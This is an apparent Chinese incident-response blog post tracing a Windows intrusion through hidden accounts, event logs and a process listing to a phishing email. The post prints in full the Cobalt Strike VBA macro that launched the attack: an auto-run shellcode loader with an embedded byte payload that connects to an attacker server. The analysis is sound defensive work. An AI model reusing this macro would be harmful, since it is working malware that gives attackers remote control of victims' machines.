入侵排查

1.账号安全

net user

查看是否有异常用户

未发现异常，那么接下来考虑隐藏账户或者克隆账号

发现隐藏账号

wmic useraccount get name,sid

发现一个隐藏账号attack，还好不是克隆，不然还得翻注册表

检查异常网络连接-无

netstat -ano

全是开启监听，并无交互。

暂时放一边，从别的地方入手看看。

日志分析

排查是否有清除过日志

手动常规清除-无

先查看是否有1102清除日志的记录产生

无

使用msf清除指定日志-无

使用msf清除指定日志的话，会在系统日志留下102类型的日志

使用cs清除日志-无

无日志操作记录，但是日志服务会关闭，需要手动重启。这里并没有。

修改注册表清除-无

这时需要打开注册表排查这个路径下\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control是否多了MiniNT选项。

得出结论：

1.入侵者未清除日志

2.使用msf清除所有日志，这时没有操作记录留下，日志也不会关闭。

待分析后确认猜想。

创建用户日志分析

既然发现了隐藏账户attck$，那么首先来分析创建时间，初步判断入侵时间。

创建attck$安z账户时会产生4720-创建用户日志和4722-启用用户日志两种日志。

然而令我很失望的是，这两种日志都没有结果，那么很大概率可以判断是使用msf清除所有日志或者我不了解的手段清除了痕迹。既然这样日志上可能分析不出来什么东西了，换一个思路

进程分析

查看是否有可疑的进程

wmic process get commandline,executablepath,executionstate,name,priority,processid,parentprocessid /formate:list

很多，复制下来慢慢看

CommandLine=C:\Windows\system32\svchost.exe -k DcomLaunch
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=804
CommandLine="C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmacthlp.exe
ExecutionState=
Name=vmacthlp.exe
ParentProcessId=608
Priority=8
ProcessId=848
CommandLine=C:\Windows\system32\svchost.exe -k rpcss
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=880
CommandLine=C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=916
CommandLine=C:\Windows\system32\svchost.exe -k GPSvcGroup
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1004
CommandLine=C:\Windows\system32\svchost.exe -k netsvcs
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=220
CommandLine=C:\Windows\system32\SLsvc.exe
ExecutablePath=C:\Windows\system32\SLsvc.exe
ExecutionState=
Name=SLsvc.exe
ParentProcessId=608
Priority=8
ProcessId=304
CommandLine=C:\Windows\system32\svchost.exe -k LocalService
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=448
CommandLine=C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=736
CommandLine=C:\Windows\system32\svchost.exe -k NetworkService
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=344
CommandLine=C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1132
CommandLine=taskeng.exe {C1AD95CB-CEA5-43D4-8072-C2E0817CD62D}
ExecutablePath=C:\Windows\system32\taskeng.exe
ExecutionState=
Name=taskeng.exe
ParentProcessId=220
Priority=6
ProcessId=1140
CommandLine=C:\Windows\System32\spoolsv.exe
ExecutablePath=C:\Windows\System32\spoolsv.exe
ExecutionState=
Name=spoolsv.exe
ParentProcessId=608
Priority=8
ProcessId=1316
CommandLine="C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICT
UPDATE.EXE"
ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDI
CTUPDATE.EXE
ExecutionState=
Name=IMEDICTUPDATE.EXE
ParentProcessId=608
Priority=8
ProcessId=1368
CommandLine=taskeng.exe {36687750-3988-46D1-BC9B-560C2F7A36BA}
ExecutablePath=C:\Windows\system32\taskeng.exe
ExecutionState=
Name=taskeng.exe
ParentProcessId=220
Priority=8
ProcessId=1604
CommandLine="C:\Windows\system32\Dwm.exe"
ExecutablePath=C:\Windows\system32\Dwm.exe
ExecutionState=
Name=dwm.exe
ParentProcessId=736
Priority=8
ProcessId=1652
CommandLine=C:\Windows\Explorer.EXE
ExecutablePath=C:\Windows\Explorer.EXE
ExecutionState=
Name=explorer.exe
ParentProcessId=1620
Priority=8
ProcessId=1792
CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ExecutionState=
Name=vmtoolsd.exe
ParentProcessId=1792
Priority=8
ProcessId=1912
CommandLine=C:\Windows\system32\conime.exe
ExecutablePath=C:\Windows\system32\conime.exe
ExecutionState=
Name=conime.exe
ParentProcessId=1780
Priority=8
ProcessId=1804
CommandLine=C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1860
CommandLine=C:\Windows\system32\svchost.exe -k regsvc
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1928
CommandLine="C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.ex
e"
ExecutablePath=C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.
exe
ExecutionState=
Name=VGAuthService.exe
ParentProcessId=608
Priority=8
ProcessId=1964
CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ExecutionState=
Name=vmtoolsd.exe
ParentProcessId=608
Priority=13
ProcessId=1572
CommandLine=C:\Windows\System32\svchost.exe -k WerSvcGroup
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=2008
CommandLine="C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtec
tionPlatform\OSPPSVC.EXE"
ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProt
ectionPlatform\OSPPSVC.EXE
ExecutionState=
Name=OSPPSVC.EXE
ParentProcessId=608
Priority=8
ProcessId=1580
CommandLine=C:\Windows\system32\wbem\wmiprvse.exe
ExecutablePath=C:\Windows\system32\wbem\wmiprvse.exe
ExecutionState=
Name=WmiPrvSE.exe
ParentProcessId=804
Priority=8
ProcessId=2172
CommandLine=C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-
00805FC79235}
ExecutablePath=C:\Windows\system32\dllhost.exe
ExecutionState=
Name=dllhost.exe
ParentProcessId=608
Priority=8
ProcessId=2436
CommandLine=C:\Windows\System32\msdtc.exe
ExecutablePath=C:\Windows\System32\msdtc.exe
ExecutionState=
Name=msdtc.exe
ParentProcessId=608
Priority=8
ProcessId=2548
CommandLine="C:\Windows\system32\wuauclt.exe"
ExecutablePath=C:\Windows\system32\wuauclt.exe
ExecutionState=
Name=wuauclt.exe
ParentProcessId=220
Priority=8
ProcessId=2632
CommandLine="C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
ExecutablePath=C:\Windows\system32\mmc.exe
ExecutionState=
Name=mmc.exe
ParentProcessId=1612
Priority=8
ProcessId=2740
CommandLine="C:\Windows\system32\cmd.exe"
ExecutablePath=C:\Windows\system32\cmd.exe
ExecutionState=
Name=cmd.exe
ParentProcessId=1792
Priority=8
ProcessId=2212
CommandLine=wmic  process get commandline,executablepath,executionstate,name,pri
ority,processid,parentprocessid /format:list
ExecutablePath=C:\Windows\System32\Wbem\WMIC.exe
ExecutionState=
Name=WMIC.exe
ParentProcessId=2212
Priority=8
ProcessId=2168
C:\Users\Administrator>a

这你妹的我拿眼睛怎么看得出来东西

咋办呢，手工整不动了，上工具！

传入procexp

好家伙

思维固化！！！！

应急思维过于固化，想着上来按照经验套路走，导致浪费了很多时间。

就在我走头无路之时发现？？桌面已经有两个文件了？！

而且别人提示的这么明显，

第一：启用了宏的文档

第二：Foxmail

这不就是明摆着告诉你邮件钓鱼+宏病毒上线了嘛。

真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。" class="reference-link">真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。

那么初步确定，钓鱼邮件+CS宏病毒上线。

当我点击了带有cs宏病毒的文档后再次查看连接

依旧没有发现心跳包，不知道是因为时间太久被放弃了还是什么原因。

恶意样本分析

查看宏病毒

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String
#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 64, 31, 0, 0, 83, 80, 104, 87, -119, -97, _
-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
-1, -1, 47, 57, 69, 117, 105, 0, 50, -17, 48, -30, -20, 49, -42, 91, -113, -15, -38, 25, 103, -98, 68, -2, -55, -82, -23, -73, 0, 122, -72, 48, 65, 102, -105, -53, -89, 61, -64, -25, _
-66, -15, -78, 2, 60, 114, -62, 84, -93, 39, 111, -93, 15, -51, 36, -64, 92, 74, -18, 50, 48, -90, -115, -28, -28, -24, -57, -22, -59, 15, -104, 48, -105, -69, -34, -14, -108, -36, -118, -102, _
-78, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, _
53, 46, 48, 59, 32, 66, 79, 73, 69, 57, 59, 69, 78, 85, 83, 83, 69, 77, 41, 13, 10, 0, -31, 98, -128, 117, -15, -11, 37, 50, -90, -79, 12, -110, 87, -11, 72, 29, -15, 99, _
-43, -2, -75, 115, -57, -116, 54, -15, -4, 87, -87, 115, 7, -75, 97, -90, 77, -97, 94, 111, -60, 116, -57, -81, 24, -52, -128, 66, 80, 55, -33, 2, 81, 94, 105, 7, -26, -55, 122, -70, _
-40, -47, -47, 81, -121, 73, -18, 53, 1, -13, 120, -76, 28, -73, 100, -12, 85, 77, 66, 16, 91, -51, 17, -70, 115, -10, -24, -32, -113, -38, -119, 108, -46, 116, -89, -109, -93, 61, -118, 51, _
-19, -85, 27, -101, -47, -123, -85, -78, -76, -81, -34, -71, 127, 123, -66, -38, -34, 70, -101, 102, 61, -47, -27, -29, -67, 112, -4, -58, 86, -21, 95, 53, 10, 75, 1, 67, 111, 107, -11, -108, _
5, 57, -15, -47, -58, -104, 29, -111, -13, 35, 106, -67, -47, -36, -36, -20, -26, 119, -17, -87, -23, 5, -24, 79, -74, -70, 65, 85, 65, -88, 22, -44, -9, 33, -21, 60, 52, 64, -82, 85, _
26, 23, 90, 69, 15, 53, -85, -70, -108, -122, 60, 12, 10, 10, -55, 89, -46, 109, -32, -53, -76, -13, 52, -96, -44, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56, 0, 18, 52, 86, 120)
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub

可以看到这是一段简单的cs直接生成VBA的宏病毒，并未使用加密混淆等免杀手段。

简单分析

//调用windows的api：KERNEL32.dll做了四个事情
1.//CreateRemoteThread创建线程
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    2.//VirtualAllocEx申请内存，类似c++的virtualalloc或者virtualprotect
 Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
        3.//WriteProcessMemory写进程内存
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
            4.//创建进程CreateProcessA
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
//之后就是往内存中放入shellcode，shellcode就是myarray里面那一坨
                简单分析：
//首先使用 if 语句来确定系统是 32 位还是 64 位。 如果系统是 64 位，则将变量 sProc 设置为 rundll32.exe 的位置，该位置为 "windir"（Windows 目录）加上 "\SysWOW64\rundll32.exe"；如果系统是 32 位，则将变量 sProc 设置为 "windir" 加上 "\System32\rundll32.exe"。
If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If
//接下来，调用 RunStuff 函数来启动 rundll32.exe 进程。 该函数的参数包括要运行的进程的路径（在此情况下为 sProc）以及其他选项，例如启动方式（ByVal 0&）和窗口状态（ByVal 1&）。
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
//然后，调用 AllocStuff 函数分配进程地址空间中的内存。 该函数的参数包括要分配内存的进程（pInfo.hProcess），要分配的内存数（UBound(myArray)），内存保护（&H1000，表示可读写）和内存分配类型（&H40，表示内存可执行）。
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)                    
//然后，使用 for 循环遍历 myArray 数组，并使用 WriteStuff 函数将数组的每个元素写入分配的内存。 WriteStuff 函数的参数包括要写入的进程（pInfo.hProcess），内存地址（rwxpage + offset），要写入的数据（myByte）和数据大小（1）。
 For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)

总的来说宏病毒也是shellcodeloader的一种，和c++写shellcodeloader的那一套很像，virtualalloc、RTLmove/copymemory、CreateThread这样。

思路都差不多就是要先搞到一段可读可写可执行的内存，把你的shellcode丢进去，创建线程，完事。

可以看到一点开文档，任务管理器中就会看到被启用的rundll32

宏代码中并没有其他的dll注入，写定时任务等操作，仅是起到了一个简单shellcodeloader的作用，用于上线攻击者的cs服务器。至此样本分析结束。

### ### 接下来的常规操作就是删除钓鱼文档，删除创建的隐藏用户，排查是否有其他后门就结案了。

但是总觉得还有太多没有理清让我疑惑的地方了

1.cs上线之后攻击者真的没有使用cs对其进行持久化操作吗？

2.攻击者的入侵痕迹真的是我所想的钓鱼邮件+宏病毒上线cs这么简单吗？

为什么收件人是已经是attack$?是否是攻击者通过别的方式入侵，创建attack这个账户，然后自己下载的邮箱接受钓鱼邮件上线的cs呢？

3.既然创建了隐藏账户，为什么没有留下4720和4722日志，如果是cs清除的日志，为什么日志服务没有异常关闭？

敬请收看windows应急下（如果本菜鸡还能发现点啥踪迹分析出来的话）

菜狗windows应急响应上